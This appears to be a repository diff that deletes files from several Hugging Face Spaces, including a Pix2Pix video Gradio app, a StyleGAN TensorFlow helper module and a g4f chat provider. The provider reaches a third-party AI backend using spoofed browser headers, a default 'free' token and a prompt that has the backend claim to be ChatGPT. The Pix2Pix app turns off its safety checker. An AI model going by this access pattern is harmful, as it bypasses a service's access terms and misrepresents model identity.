import { ButtonScrollToBottom } from '@/components/button-scroll-to-bottom'
import StopIcon from '@/assets/images/stop.svg'
import { useBing } from '@/lib/hooks/use-bing'
import { ChatMessageModel } from '@/lib/bots/bing/types'
import { ChatNotification } from './chat-notification'
import { Settings } from './settings'
import { ChatHistory } from './chat-history'

export type ChatProps = React.ComponentProps<'div'> & { initialMessages?: ChatMessageModel[] }

export default function Chat({ className }: ChatProps) {
  const [bingStyle, setBingStyle] = useAtom(bingConversationStyleAtom)
  const {
    messages,
    sendMessage,
    resetConversation,
    stopGenerating,
    setInput,
    bot,
    input,
    generating,
    isSpeaking,
    uploadImage,
    attachmentList,
    setAttachmentList,
  } = useBing()

  useEffect(() => {
    window.scrollTo({
      top: document.body.offsetHeight,
      behavior: 'smooth'
    })
  }, [])

  return (
    <div className="flex flex-1 flex-col">
      <Settings />
      <div className={cn('flex-1 pb-16', className)}>
        <ChatHeader />
        <WelcomeScreen setInput={setInput} />
        <ToneSelector type={bingStyle} onChange={setBingStyle} />
        {messages.length ? (
          <>
            <ChatList messages={messages} />
            <ChatScrollAnchor trackVisibility={generating} />
            <ChatNotification message={messages.at(-1)} bot={bot} />
            <ChatSuggestions setInput={setInput} suggestions={messages.at(-1)?.suggestedResponses} />

            {generating ? (
              <div className="flex h-10 items-center justify-center my-4">
                <button
                  onClick={stopGenerating}
                  className="typing-control-item stop"
                >
                  <Image alt="stop" src={StopIcon} width={24} className="mr-1" />
                  <span>停止响应</span>
                </button>
              </div>
            ) : null}
          </>
        ) : null}
      </div>
      <ChatPanel
        className="pt-24 z-10"
        isSpeaking={isSpeaking}
        generating={generating}
        sendMessage={sendMessage}
        input={input}
        setInput={setInput}
        resetConversation={resetConversation}
        uploadImage={uploadImage}
        attachmentList={attachmentList}
        setAttachmentList={setAttachmentList}
      />
      <ButtonScrollToBottom />
    </div>
  )
}
spaces/AIFILMS/Pix2Pix-Video/app.py
DELETED
@@ -1,248 +0,0 @@
import gradio as gr
import os
import cv2
import numpy as np
from moviepy.editor import *
from share_btn import community_icon_html, loading_icon_html, share_js

from diffusers import DiffusionPipeline, EulerAncestralDiscreteScheduler
import torch
from PIL import Image
import time
import psutil
import random

is_shared_ui = True if "AIFILMS/Pix2Pix-Video" in os.environ['SPACE_ID'] else False

pipe = DiffusionPipeline.from_pretrained("timbrooks/instruct-pix2pix", torch_dtype=torch.float16, safety_checker=None)
pipe.scheduler = EulerAncestralDiscreteScheduler.from_config(pipe.scheduler.config)
if(not is_shared_ui):
    pipe.enable_xformers_memory_efficient_attention()
    pipe.unet.to(memory_format=torch.channels_last)

device = "GPU 🔥" if torch.cuda.is_available() else "CPU 🥶"

if torch.cuda.is_available():
    pipe = pipe.to("cuda")

def pix2pix(
    prompt,
    text_guidance_scale,
    image_guidance_scale,
    image,
    steps,
    neg_prompt="",
    width=512,
    height=512,
    seed=0,
):
    print(psutil.virtual_memory())  # print memory usage

    if seed == 0:
        seed = random.randint(0, 2147483647)

    generator = torch.Generator("cuda").manual_seed(seed)

    try:
        image = Image.open(image)
        ratio = min(height / image.height, width / image.width)
        image = image.resize((int(image.width * ratio), int(image.height * ratio)), Image.LANCZOS)

        result = pipe(
            prompt,
            negative_prompt=neg_prompt,
            image=image,
            num_inference_steps=int(steps),
            image_guidance_scale=image_guidance_scale,
            guidance_scale=text_guidance_scale,
            generator=generator,
        )

        # return replace_nsfw_images(result)
        return result.images, result.nsfw_content_detected, seed
    except Exception as e:
        return None, None, error_str(e)

def error_str(error, title="Error"):
    return (
        f"""#### {title}
{error}"""
        if error
        else ""
    )

def get_frames(video_in):
    frames = []
    # resize the video
    clip = VideoFileClip(video_in)

    # check fps
    if clip.fps > 30:
        print("video rate is over 30, resetting to 30")
        clip_resized = clip.resize(height=512)
        clip_resized.write_videofile("video_resized.mp4", fps=30)
    else:
        print("video rate is OK")
        clip_resized = clip.resize(height=512)
        clip_resized.write_videofile("video_resized.mp4", fps=clip.fps)

    print("video resized to 512 height")

    # Opens the Video file with CV2
    cap = cv2.VideoCapture("video_resized.mp4")

    fps = cap.get(cv2.CAP_PROP_FPS)
    print("video fps: " + str(fps))
    i = 0
    while(cap.isOpened()):
        ret, frame = cap.read()
        if ret == False:
            break
        cv2.imwrite('kang'+str(i)+'.jpg', frame)
        frames.append('kang'+str(i)+'.jpg')
        i += 1

    cap.release()
    cv2.destroyAllWindows()
    print("broke the video into frames")

    return frames, fps


def create_video(frames, fps):
    print("building video result")
    clip = ImageSequenceClip(frames, fps=fps)
    clip.write_videofile("movie.mp4", fps=fps)

    return 'movie.mp4'


def infer(prompt, video_in, seed_in, trim_value):
    if(is_shared_ui):
        raise gr.Error("This Space doesn't work on this shared UI.")
    print(prompt)
    break_vid = get_frames(video_in)

    frames_list = break_vid[0]
    fps = break_vid[1]
    n_frame = int(trim_value*fps)

    if n_frame >= len(frames_list):
        print("video is shorter than the cut value")
        n_frame = len(frames_list)

    result_frames = []
    print("set stop frames to: " + str(n_frame))

    for i in frames_list[0:int(n_frame)]:
        pix2pix_img = pix2pix(prompt, 5.5, 1.5, i, 15, "", 512, 512, seed_in)
        images = pix2pix_img[0]
        rgb_im = images[0].convert("RGB")

        # exporting the image
        rgb_im.save(f"result_img-{i}.jpg")
        result_frames.append(f"result_img-{i}.jpg")
        print("frame " + i + "/" + str(n_frame) + ": done;")

    final_vid = create_video(result_frames, fps)
    print("finished !")

    return final_vid, gr.Group.update(visible=True)

title = """
<div style="text-align: center; max-width: 700px; margin: 0 auto;">
  <div
    style="
      display: inline-flex;
      align-items: center;
      gap: 0.8rem;
      font-size: 1.75rem;
    "
  >
    <h1 style="font-weight: 900; margin-bottom: 7px; margin-top: 5px;">
      Pix2Pix Video
    </h1>
  </div>
  <p style="margin-bottom: 10px; font-size: 94%">
    Apply Instruct Pix2Pix Diffusion to a video
  </p>
</div>
"""

article = """
<div class="footer">
  <p>
    Examples by <a href="https://twitter.com/CitizenPlain" target="_blank">Nathan Shipley</a> •
    Follow <a href="https://twitter.com/fffiloni" target="_blank">Sylvain Filoni</a> for future updates 🤗
  </p>
</div>
<div id="may-like-container" style="display: flex;justify-content: center;flex-direction: column;align-items: center;margin-bottom: 30px;">
  <p>You may also like: </p>
  <div id="may-like-content" style="display:flex;flex-wrap: wrap;align-items:center;height:20px;">
    <svg height="20" width="162" style="margin-left:4px;margin-bottom: 6px;">
      <a href="https://huggingface.co/spaces/timbrooks/instruct-pix2pix" target="_blank">
        <image href="https://img.shields.io/badge/🤗 Spaces-Instruct_Pix2Pix-blue" src="https://img.shields.io/badge/🤗 Spaces-Instruct_Pix2Pix-blue.png" height="20"/>
      </a>
    </svg>
  </div>
</div>
"""

with gr.Blocks(css='style.css') as demo:
    if(is_shared_ui):
        with gr.Box():
            top_description = gr.HTML(f'''
            <div class="gr-prose" style="max-width: 80%">
            <h2 style="margin-top: 0">Attention - This Space doesn't work in this shared UI</h2>
            <p>For it to work, you can access the <a href="https://huggingface.co/spaces/fffiloni/Pix2Pix-Video">original</a> or duplicate this Space and run it on your own profile using a GPU. <a class="duplicate-button" style="display:inline-block" target="_blank" href="https://huggingface.co/spaces/{os.environ['SPACE_ID']}?duplicate=true"><img src="https://img.shields.io/badge/-Duplicate%20Space-blue?labelColor=white&style=flat&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAP5JREFUOE+lk7FqAkEURY+ltunEgFXS2sZGIbXfEPdLlnxJyDdYB62sbbUKpLbVNhyYFzbrrA74YJlh9r079973psed0cvUD4A+4HoCjsA85X0Dfn/RBLBgBDxnQPfAEJgBY+A9gALA4tcbamSzS4xq4FOQAJgCDwV2CPKV8tZAJcAjMMkUe1vX+U+SMhfAJEHasQIWmXNN3abzDwHUrgcRGmYcgKe0bxrblHEB4E/pndMazNpSZGcsZdBlYJcEL9Afo75molJyM2FxmPgmgPqlWNLGfwZGG6UiyEvLzHYDmoPkDDiNm9JR9uboiONcBXrpY1qmgs21x1QwyZcpvxt9NS09PlsPAAAAAElFTkSuQmCC&logoWidth=14" alt="Duplicate Space"></a></p>
            </div>
            ''')
    with gr.Column(elem_id="col-container"):
        gr.HTML(title)
        with gr.Row():
            with gr.Column():
                video_inp = gr.Video(label="Video source", source="upload", type="filepath", elem_id="input-vid")
                prompt = gr.Textbox(label="Prompt", placeholder="enter prompt", show_label=False, elem_id="prompt-in")
                with gr.Row():
                    seed_inp = gr.Slider(label="Seed", minimum=0, maximum=2147483647, step=1, value=123456)
                    trim_in = gr.Slider(label="Cut video at (s)", minimum=1, maximum=3, step=1, value=1)
            with gr.Column():
                video_out = gr.Video(label="Pix2pix video result", elem_id="video-output")
                gr.HTML("""
                <a style="display:inline-block" href="https://huggingface.co/spaces/fffiloni/Pix2Pix-Video?duplicate=true"><img src="https://img.shields.io/badge/-Duplicate%20Space-blue?labelColor=white&style=flat&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAP5JREFUOE+lk7FqAkEURY+ltunEgFXS2sZGIbXfEPdLlnxJyDdYB62sbbUKpLbVNhyYFzbrrA74YJlh9r059973psedwcvUD4A+4HoCjsA85X0Dfn/RBLBgBDxnQPfAEJgBY+A9gALA4tcbamSzS4xq4FOQAJgCDwV2CPKV8tZAJcAjMMkUe1vX+U+SMhfAJEHasQIWmXNN3abzDwHUrgcRGmYcgKe0bxrblHEB4E/pndMazNpSZGcsZdBlYJcEL9Afo75molJyM2FxmPgmgPqlWNLGfwZGG6UiyEvLzHYDmoPkDDiNm9JR9uboiONcBXrpY1qmgs21x1QwyZcpvxt9NS09PlsPAAAAAElFTkSuQmCC&logoWidth=14" alt="Duplicate Space"></a>
                work with longer videos / skip the queue:
                """, elem_id="duplicate-container")
                submit_btn = gr.Button("Generate Pix2Pix video")

        with gr.Group(elem_id="share-btn-container", visible=False) as share_group:
            community_icon = gr.HTML(community_icon_html)
            loading_icon = gr.HTML(loading_icon_html)
            share_button = gr.Button("Share to community", elem_id="share-btn")

        inputs = [prompt, video_inp, seed_inp, trim_in]
        outputs = [video_out, share_group]

        ex = gr.Examples(
            [
                ["Make it a marble sculpture", "./examples/pexels-jill-burrow-7665249_512x512.mp4", 422112651, 4],
                ["Make it molten lava", "./examples/Ocean_Pexels_ 8953474_512x512.mp4", 43571876, 4]
            ],
            inputs=inputs,
            outputs=outputs,
            fn=infer,
            cache_examples=False,
        )

        gr.HTML(article)

    submit_btn.click(infer, inputs, outputs)
    share_button.click(None, [], [], _js=share_js)

# queue() must run before launch() for max_size to take effect
demo.queue(max_size=12).launch()
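The trim logic in `infer` above (compute `trim_value * fps`, then clamp to the number of extracted frames) can be isolated as a small pure function; the helper name below is illustrative, not part of the original app:

```python
def frames_to_process(num_frames: int, fps: float, trim_seconds: float) -> int:
    """Return how many frames to run through pix2pix, clamped to the clip length."""
    n_frame = int(trim_seconds * fps)
    if n_frame >= num_frames:
        # video is shorter than the cut value
        n_frame = num_frames
    return n_frame

# A 4 s clip at 30 fps trimmed to 2 s processes 60 frames...
assert frames_to_process(num_frames=120, fps=30.0, trim_seconds=2) == 60
# ...but a 1.5 s clip trimmed to 2 s is clamped to all 45 of its frames.
assert frames_to_process(num_frames=45, fps=30.0, trim_seconds=2) == 45
```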
spaces/AIZerotoHero-Health4All/03-Datasets/README.md
DELETED
@@ -1,12 +0,0 @@
---
title: 03 Datasets
emoji: 📊
colorFrom: gray
colorTo: green
sdk: gradio
sdk_version: 3.12.0
app_file: app.py
pinned: false
---

Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
spaces/ATang0729/Forecast4Muses/Model/Model6/__init__.py
DELETED
File without changes
spaces/AchyuthGamer/OpenGPT-Chat-UI/.svelte-kit/types/src/routes/r/[id]/proxy+page.server.ts
DELETED
@@ -1,35 +0,0 @@
// @ts-nocheck
import type { PageServerLoad } from "./$types";
import { collections } from "$lib/server/database";
import { error } from "@sveltejs/kit";
import type { WebSearchMessageResult } from "$lib/types/WebSearch";

export const load = async ({ params }: Parameters<PageServerLoad>[0]) => {
  /*const conversation = await collections.sharedConversations.findOne({
    _id: params.id,
  });

  if (!conversation) {
    throw error(404, "Conversation not found");
  }

  const webSearchesId = conversation.messages
    .filter((message) => message.webSearchId)
    .map((message) => new ObjectId(message.webSearchId));

  const results = await collections.webSearches.find({ _id: { $in: webSearchesId } }).toArray();

  const searches = Object.fromEntries(
    results.map((x) => [
      x._id.toString(),
      [...x.messages, { type: "result", id: x._id.toString() } satisfies WebSearchMessageResult],
    ])
  );

  return {
    messages: conversation.messages,
    title: conversation.title,
    model: conversation.model,
    searches,
  };*/
};
spaces/AchyuthGamer/OpenGPT/g4f/Provider/Theb.py
DELETED
@@ -1,97 +0,0 @@
from __future__ import annotations

import json
import random

import requests

from ..typing import Any, CreateResult
from .base_provider import BaseProvider


class Theb(BaseProvider):
    url = "https://theb.ai"
    working = True
    supports_stream = True
    supports_gpt_35_turbo = True
    needs_auth = True

    @staticmethod
    def create_completion(
        model: str,
        messages: list[dict[str, str]],
        stream: bool, **kwargs: Any) -> CreateResult:

        conversation = "\n".join(f"{message['role']}: {message['content']}" for message in messages)
        conversation += "\nassistant: "

        auth = kwargs.get("auth", {
            "bearer_token": "free",
            "org_id": "theb",
        })

        bearer_token = auth["bearer_token"]
        org_id = auth["org_id"]

        headers = {
            'authority': 'beta.theb.ai',
            'accept': 'text/event-stream',
            'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
            'authorization': 'Bearer ' + bearer_token,
            'content-type': 'application/json',
            'origin': 'https://beta.theb.ai',
            'referer': 'https://beta.theb.ai/home',
            'sec-ch-ua': '"Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-origin',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
            'x-ai-model': 'ee8d4f29cb7047f78cbe84313ed6ace8',
        }

        req_rand = random.randint(100000000, 9999999999)

        json_data: dict[str, Any] = {
            "text": conversation,
            "category": "04f58f64a4aa4191a957b47290fee864",
            "model": "ee8d4f29cb7047f78cbe84313ed6ace8",
            "model_params": {
                "system_prompt": "You are ChatGPT, a large language model trained by OpenAI, based on the GPT-3.5 architecture.\nKnowledge cutoff: 2021-09\nCurrent date: {{YYYY-MM-DD}}",
                "temperature": kwargs.get("temperature", 1),
                "top_p": kwargs.get("top_p", 1),
                "frequency_penalty": kwargs.get("frequency_penalty", 0),
                "presence_penalty": kwargs.get("presence_penalty", 0),
                "long_term_memory": "auto"
            }
        }

        response = requests.post(f"https://beta.theb.ai/api/conversation?org_id={org_id}&req_rand={req_rand}",
                                 headers=headers, json=json_data, stream=True)

        response.raise_for_status()
        content = ""
        next_content = ""
        for chunk in response.iter_lines():
            if b"content" in chunk:
                next_content = content
                data = json.loads(chunk.decode().split("data: ")[1])
                content = data["content"]
                yield data["content"].replace(next_content, "")

    @classmethod
    @property
    def params(cls):
        params = [
            ("model", "str"),
            ("messages", "list[dict[str, str]]"),
            ("auth", "list[dict[str, str]]"),
            ("stream", "bool"),
            ("temperature", "float"),
            ("presence_penalty", "int"),
            ("frequency_penalty", "int"),
            ("top_p", "int")
        ]
        param = ", ".join([": ".join(p) for p in params])
        return f"g4f.provider.{cls.__name__} supports: ({param})"
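The prompt construction at the top of `create_completion` flattens an OpenAI-style message list into a single transcript string ending with an empty `assistant:` turn. A minimal reproduction of just that step, with an illustrative helper name:

```python
def build_conversation(messages: list[dict[str, str]]) -> str:
    """Flatten role/content messages into one transcript, ready for the model to continue."""
    conversation = "\n".join(f"{message['role']}: {message['content']}" for message in messages)
    return conversation + "\nassistant: "

msgs = [
    {"role": "system", "content": "You are helpful."},
    {"role": "user", "content": "Hi"},
]
assert build_conversation(msgs) == "system: You are helpful.\nuser: Hi\nassistant: "
```

The trailing `"assistant: "` is what prompts the backend to generate the next assistant turn.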
spaces/AgentVerse/agentVerse/agentverse/environments/simulation_env/rules/visibility/sde_team.py
DELETED
@@ -1,24 +0,0 @@
from __future__ import annotations

import random
from typing import TYPE_CHECKING, Any, List, Union

from . import visibility_registry as VisibilityRegistry
from .base import BaseVisibility

if TYPE_CHECKING:
    from agentverse.environments import BaseEnvironment


@VisibilityRegistry.register("sde_team")
class SdeTeamVisibility(BaseVisibility):
    """Visibility function for code problems. No need to change visibility."""

    def update_visible_agents(self, environment: BaseEnvironment):
        return

    def reset(self):
        return
spaces/Agusbs98/automatic-ecg-diagnosis/README.md
DELETED
@@ -1,12 +0,0 @@
---
title: Automatic Ecg Diagnosis
emoji: 👁
colorFrom: indigo
colorTo: pink
sdk: gradio
sdk_version: 3.29.0
app_file: app.py
pinned: false
---

Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
spaces/Alican/pixera/options/__init__.py
DELETED
@@ -1 +0,0 @@
"""This package options includes option modules: training options, test options, and basic options (used in both training and test)."""
spaces/Amrrs/DragGan-Inversion/stylegan_human/dnnlib/tflib/tfutil.py
DELETED
@@ -1,267 +0,0 @@
# Copyright (c) SenseTime Research. All rights reserved.

# Copyright (c) 2019, NVIDIA Corporation. All rights reserved.
#
# This work is made available under the Nvidia Source Code License-NC.
# To view a copy of this license, visit
# https://nvlabs.github.io/stylegan2/license.html

"""Miscellaneous helper utils for Tensorflow."""

from typing import Any, Iterable, List, Union
import tensorflow.contrib  # requires TensorFlow 1.x!
import os
import numpy as np
import tensorflow as tf

# Silence deprecation warnings from TensorFlow 1.13 onwards
import logging
logging.getLogger('tensorflow').setLevel(logging.ERROR)
tf.contrib = tensorflow.contrib


TfExpression = Union[tf.Tensor, tf.Variable, tf.Operation]
"""A type that represents a valid Tensorflow expression."""

TfExpressionEx = Union[TfExpression, int, float, np.ndarray]
"""A type that can be converted to a valid Tensorflow expression."""


def run(*args, **kwargs) -> Any:
    """Run the specified ops in the default session."""
    assert_tf_initialized()
    return tf.get_default_session().run(*args, **kwargs)


def is_tf_expression(x: Any) -> bool:
    """Check whether the input is a valid Tensorflow expression, i.e., Tensorflow Tensor, Variable, or Operation."""
    return isinstance(x, (tf.Tensor, tf.Variable, tf.Operation))


def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]:
    """Convert a Tensorflow shape to a list of ints. Retained for backwards compatibility -- use TensorShape.as_list() in new code."""
    return [dim.value for dim in shape]


def flatten(x: TfExpressionEx) -> TfExpression:
    """Shortcut function for flattening a tensor."""
    with tf.name_scope("Flatten"):
        return tf.reshape(x, [-1])


def log2(x: TfExpressionEx) -> TfExpression:
    """Logarithm in base 2."""
    with tf.name_scope("Log2"):
        return tf.log(x) * np.float32(1.0 / np.log(2.0))


def exp2(x: TfExpressionEx) -> TfExpression:
    """Exponent in base 2."""
    with tf.name_scope("Exp2"):
        return tf.exp(x * np.float32(np.log(2.0)))


def lerp(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpressionEx:
    """Linear interpolation."""
    with tf.name_scope("Lerp"):
        return a + (b - a) * t


def lerp_clip(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpression:
    """Linear interpolation with clip."""
    with tf.name_scope("LerpClip"):
        return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0)


def absolute_name_scope(scope: str) -> tf.name_scope:
    """Forcefully enter the specified name scope, ignoring any surrounding scopes."""
    return tf.name_scope(scope + "/")


def absolute_variable_scope(scope: str, **kwargs) -> tf.variable_scope:
    """Forcefully enter the specified variable scope, ignoring any surrounding scopes."""
    return tf.variable_scope(tf.VariableScope(name=scope, **kwargs), auxiliary_name_scope=False)


def _sanitize_tf_config(config_dict: dict = None) -> dict:
    # Defaults.
    cfg = dict()
    # Random seed for NumPy. None = keep as is.
    cfg["rnd.np_random_seed"] = None
    # Random seed for TensorFlow. 'auto' = derive from NumPy random state. None = keep as is.
    cfg["rnd.tf_random_seed"] = "auto"
    # 0 = Print all available debug info from TensorFlow. 1 = Print warnings and errors, but disable debug info.
    cfg["env.TF_CPP_MIN_LOG_LEVEL"] = "1"
    # False = Check that all ops are available on the designated device. True = Skip the check for ops that are not used.
    cfg["graph_options.place_pruned_graph"] = True
    # False = Allocate all GPU memory at the beginning. True = Allocate only as much GPU memory as needed.
    cfg["gpu_options.allow_growth"] = True

    # Remove defaults for environment variables that are already set.
    for key in list(cfg):
        fields = key.split(".")
        if fields[0] == "env":
            assert len(fields) == 2
            if fields[1] in os.environ:
                del cfg[key]

    # User overrides.
    if config_dict is not None:
        cfg.update(config_dict)
    return cfg


def init_tf(config_dict: dict = None) -> None:
    """Initialize TensorFlow session using good default settings."""
    # Skip if already initialized.
    if tf.get_default_session() is not None:
        return

    # Setup config dict and random seeds.
    cfg = _sanitize_tf_config(config_dict)
    np_random_seed = cfg["rnd.np_random_seed"]
    if np_random_seed is not None:
        np.random.seed(np_random_seed)
    tf_random_seed = cfg["rnd.tf_random_seed"]
    if tf_random_seed == "auto":
        tf_random_seed = np.random.randint(1 << 31)
    if tf_random_seed is not None:
        tf.set_random_seed(tf_random_seed)

    # Setup environment variables.
    for key, value in cfg.items():
        fields = key.split(".")
        if fields[0] == "env":
            assert len(fields) == 2
            os.environ[fields[1]] = str(value)

    # Create default TensorFlow session.
    create_session(cfg, force_as_default=True)


def assert_tf_initialized():
    """Check that TensorFlow session has been initialized."""
    if tf.get_default_session() is None:
        raise RuntimeError(
            "No default TensorFlow session found. Please call dnnlib.tflib.init_tf().")


def create_session(config_dict: dict = None, force_as_default: bool = False) -> tf.Session:
    """Create tf.Session based on config dict."""
    # Setup TensorFlow config proto.
    cfg = _sanitize_tf_config(config_dict)
    config_proto = tf.ConfigProto()
    for key, value in cfg.items():
        fields = key.split(".")
        if fields[0] not in ["rnd", "env"]:
            obj = config_proto
            for field in fields[:-1]:
                obj = getattr(obj, field)
            setattr(obj, fields[-1], value)

    # Create session.
    session = tf.Session(config=config_proto)
    if force_as_default:
        # pylint: disable=protected-access
        session._default_session = session.as_default()
        session._default_session.enforce_nesting = False
        session._default_session.__enter__()
    return session


def init_uninitialized_vars(target_vars: List[tf.Variable] = None) -> None:
|
173 |
-
"""Initialize all tf.Variables that have not already been initialized.
|
174 |
-
|
175 |
-
Equivalent to the following, but more efficient and does not bloat the tf graph:
|
176 |
-
tf.variables_initializer(tf.report_uninitialized_variables()).run()
|
177 |
-
"""
|
178 |
-
assert_tf_initialized()
|
179 |
-
if target_vars is None:
|
180 |
-
target_vars = tf.global_variables()
|
181 |
-
|
182 |
-
test_vars = []
|
183 |
-
test_ops = []
|
184 |
-
|
185 |
-
# ignore surrounding control_dependencies
|
186 |
-
with tf.control_dependencies(None):
|
187 |
-
for var in target_vars:
|
188 |
-
assert is_tf_expression(var)
|
189 |
-
|
190 |
-
try:
|
191 |
-
tf.get_default_graph().get_tensor_by_name(
|
192 |
-
var.name.replace(":0", "/IsVariableInitialized:0"))
|
193 |
-
except KeyError:
|
194 |
-
# Op does not exist => variable may be uninitialized.
|
195 |
-
test_vars.append(var)
|
196 |
-
|
197 |
-
with absolute_name_scope(var.name.split(":")[0]):
|
198 |
-
test_ops.append(tf.is_variable_initialized(var))
|
199 |
-
|
200 |
-
init_vars = [var for var, inited in zip(
|
201 |
-
test_vars, run(test_ops)) if not inited]
|
202 |
-
run([var.initializer for var in init_vars])
|
203 |
-
|
204 |
-
|
205 |
-
def set_vars(var_to_value_dict: dict) -> None:
|
206 |
-
"""Set the values of given tf.Variables.
|
207 |
-
|
208 |
-
Equivalent to the following, but more efficient and does not bloat the tf graph:
|
209 |
-
tflib.run([tf.assign(var, value) for var, value in var_to_value_dict.items()]
|
210 |
-
"""
|
211 |
-
assert_tf_initialized()
|
212 |
-
ops = []
|
213 |
-
feed_dict = {}
|
214 |
-
|
215 |
-
for var, value in var_to_value_dict.items():
|
216 |
-
assert is_tf_expression(var)
|
217 |
-
|
218 |
-
try:
|
219 |
-
setter = tf.get_default_graph().get_tensor_by_name(
|
220 |
-
var.name.replace(":0", "/setter:0")) # look for existing op
|
221 |
-
except KeyError:
|
222 |
-
with absolute_name_scope(var.name.split(":")[0]):
|
223 |
-
# ignore surrounding control_dependencies
|
224 |
-
with tf.control_dependencies(None):
|
225 |
-
setter = tf.assign(var, tf.placeholder(
|
226 |
-
var.dtype, var.shape, "new_value"), name="setter") # create new setter
|
227 |
-
|
228 |
-
ops.append(setter)
|
229 |
-
feed_dict[setter.op.inputs[1]] = value
|
230 |
-
|
231 |
-
run(ops, feed_dict)
|
232 |
-
|
233 |
-
|
234 |
-
def create_var_with_large_initial_value(initial_value: np.ndarray, *args, **kwargs):
|
235 |
-
"""Create tf.Variable with large initial value without bloating the tf graph."""
|
236 |
-
assert_tf_initialized()
|
237 |
-
assert isinstance(initial_value, np.ndarray)
|
238 |
-
zeros = tf.zeros(initial_value.shape, initial_value.dtype)
|
239 |
-
var = tf.Variable(zeros, *args, **kwargs)
|
240 |
-
set_vars({var: initial_value})
|
241 |
-
return var
|
242 |
-
|
243 |
-
|
244 |
-
def convert_images_from_uint8(images, drange=[-1, 1], nhwc_to_nchw=False):
|
245 |
-
"""Convert a minibatch of images from uint8 to float32 with configurable dynamic range.
|
246 |
-
Can be used as an input transformation for Network.run().
|
247 |
-
"""
|
248 |
-
images = tf.cast(images, tf.float32)
|
249 |
-
if nhwc_to_nchw:
|
250 |
-
images = tf.transpose(images, [0, 3, 1, 2])
|
251 |
-
return images * ((drange[1] - drange[0]) / 255) + drange[0]
|
252 |
-
|
253 |
-
|
254 |
-
def convert_images_to_uint8(images, drange=[-1, 1], nchw_to_nhwc=False, shrink=1):
|
255 |
-
"""Convert a minibatch of images from float32 to uint8 with configurable dynamic range.
|
256 |
-
Can be used as an output transformation for Network.run().
|
257 |
-
"""
|
258 |
-
images = tf.cast(images, tf.float32)
|
259 |
-
if shrink > 1:
|
260 |
-
ksize = [1, 1, shrink, shrink]
|
261 |
-
images = tf.nn.avg_pool(
|
262 |
-
images, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW")
|
263 |
-
if nchw_to_nhwc:
|
264 |
-
images = tf.transpose(images, [0, 2, 3, 1])
|
265 |
-
scale = 255 / (drange[1] - drange[0])
|
266 |
-
images = images * scale + (0.5 - drange[0] * scale)
|
267 |
-
return tf.saturate_cast(images, tf.uint8)
|
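The two conversion helpers above are inverses of each other up to rounding: one maps `[0, 255]` linearly onto `drange`, the other maps back and adds `0.5` before the cast so truncation rounds to the nearest integer. A minimal NumPy sketch of the same arithmetic (the helper names `from_uint8`/`to_uint8` are hypothetical, not part of tfutil):

```python
import numpy as np

def from_uint8(images, drange=(-1, 1)):
    # Mirrors convert_images_from_uint8: map [0, 255] linearly onto drange.
    images = images.astype(np.float32)
    return images * ((drange[1] - drange[0]) / 255) + drange[0]

def to_uint8(images, drange=(-1, 1)):
    # Mirrors convert_images_to_uint8: map drange back onto [0, 255],
    # adding 0.5 before the cast so truncation rounds to nearest.
    scale = 255 / (drange[1] - drange[0])
    images = images * scale + (0.5 - drange[0] * scale)
    return np.clip(images, 0, 255).astype(np.uint8)

pixels = np.array([0, 128, 255], dtype=np.uint8)
roundtrip = to_uint8(from_uint8(pixels))
print(roundtrip)  # [  0 128 255]
```

Without the `0.5` offset, truncation would bias every pixel downward by up to one level; `tf.saturate_cast` additionally clamps out-of-range values, which `np.clip` stands in for here.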
spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_paradigms.py
DELETED
@@ -1,770 +0,0 @@
# Copyright 2023 ParaDiGMS authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import inspect
from typing import Any, Callable, Dict, List, Optional, Union

import torch
from transformers import CLIPImageProcessor, CLIPTextModel, CLIPTokenizer

from ...image_processor import VaeImageProcessor
from ...loaders import FromSingleFileMixin, LoraLoaderMixin, TextualInversionLoaderMixin
from ...models import AutoencoderKL, UNet2DConditionModel
from ...schedulers import KarrasDiffusionSchedulers
from ...utils import (
    is_accelerate_available,
    is_accelerate_version,
    logging,
    randn_tensor,
    replace_example_docstring,
)
from ..pipeline_utils import DiffusionPipeline
from . import StableDiffusionPipelineOutput
from .safety_checker import StableDiffusionSafetyChecker


logger = logging.get_logger(__name__)  # pylint: disable=invalid-name

EXAMPLE_DOC_STRING = """
    Examples:
        ```py
        >>> import torch
        >>> from diffusers import DDPMParallelScheduler
        >>> from diffusers import StableDiffusionParadigmsPipeline

        >>> scheduler = DDPMParallelScheduler.from_pretrained("runwayml/stable-diffusion-v1-5", subfolder="scheduler")

        >>> pipe = StableDiffusionParadigmsPipeline.from_pretrained(
        ...     "runwayml/stable-diffusion-v1-5", scheduler=scheduler, torch_dtype=torch.float16
        ... )
        >>> pipe = pipe.to("cuda")

        >>> ngpu, batch_per_device = torch.cuda.device_count(), 5
        >>> pipe.wrapped_unet = torch.nn.DataParallel(pipe.unet, device_ids=[d for d in range(ngpu)])

        >>> prompt = "a photo of an astronaut riding a horse on mars"
        >>> image = pipe(prompt, parallel=ngpu * batch_per_device, num_inference_steps=1000).images[0]
        ```
"""


